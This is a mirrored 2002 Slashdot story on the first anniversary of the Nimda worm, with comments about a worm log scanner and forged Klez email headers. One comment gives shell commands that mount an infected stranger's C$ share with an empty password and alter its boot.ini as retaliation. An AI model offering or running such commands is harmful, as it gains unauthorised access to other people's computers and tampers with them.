Slashdot Mirror

← Back to Stories (view on slashdot.org)

1 Year Anniversary of Nimda Outbreak

Posted by CmdrTaco on from the my-logs-hurt dept.

dots and loops writes "Today marks one year to the date that the nimda worm began making its way across the Internet." Hey, speaking of hilarious worms, I'm still getting 5-10 klez virus's a day! Yay Security!

3 of 289 comments (clear)

  1. Still kicking by JediTrainer · · Score: 5, Informative

    If anybody is interested, I've developed WormScan last year, which is a Java-based program (GPL) which can analyze your Apache log files for pretty much anything you want (just plug in your regular expressions). It detects Nimda and CR1+2 out of the box. It's easy to add your own entries to scan for.

    According to my logs (please be gentle), I've been hit 650 times yesterday.

    Shameless plug, yes. But it does the job and the users of WormScan seem to be pretty happy with it, judging from the emails I've gotten so far.

    --

    You can accomplish anything you set your mind to. The impossible just takes a little longer.
  2. Still getting hit by rossz · · Score: 5, Informative

    No doubt in celebration of the birthday, I got a number of nimda hits this morning.

    mount -t smbfs password= //xx.xx.xx.xx/C$ /mnt/dork
    vi /mnt/dork/boot.ini

    Change the boot delay to some huge number and the boot message to "Run a virus scanner, asshole".

    umount /mnt/dork

    --
    -- Will program for bandwidth
  3. Re:How to block Klez emails from my mailbox? by Draoi · · Score: 4, Informative
    Replying to the senders (the From: address) won't work, 'coz it's forged. Klez pulls email addresses from the victim's address book/inbox and uses them for the 'from'. You have to look deeper into the headers to find the culprit.

    Here's one I just got;

    From: webmaster <webmaster@msn.com>
    Date: Wed Sep 18, 2002 15:03:16 Europe/Dublin
    To: webmaster@christymoore.net
    Subject: User code here
    Return-Path: <tony_XXXXXXXX@oceanfree.net>
    Received: from bubble.oceanfree.net ([212.2.162.35]) by ddandd.com (8.11.6/8.11.6) with ESMTP id g8IEADp05002 for <webmaster@christymoore.net>; Wed, 18 Sep 2002 15:10:13 +0100
    Received: from [193.203.147.182] (helo=Qrxy) by bubble.oceanfree.net with smtp (Exim 3.33 #3) id 17rfQB-0002p3-00 for webmaster@christymoore.net; Wed, 18 Sep 2002 15:03:16 +0100
    Mime-Version: 1.0
    Content-Type: multipart/alternative; boundary=Z0z7O8r66243H01338eADBxj05jJ7LLMnHZ85
    Me ssage-Id: <E17rfQB-0002p3-00@bubble.oceanfree.net>
    Statu s:
    Attachments: There is 1 attachment
    Do you think this was sent by webmaster@msn.com? (I hear the jokes now!). In this case, the Return-path actually contained the victim's full mail address, which I've mercifully blanked ...
    --
    Alison

    "It is a miracle that curiosity survives formal education." - Albert Einstein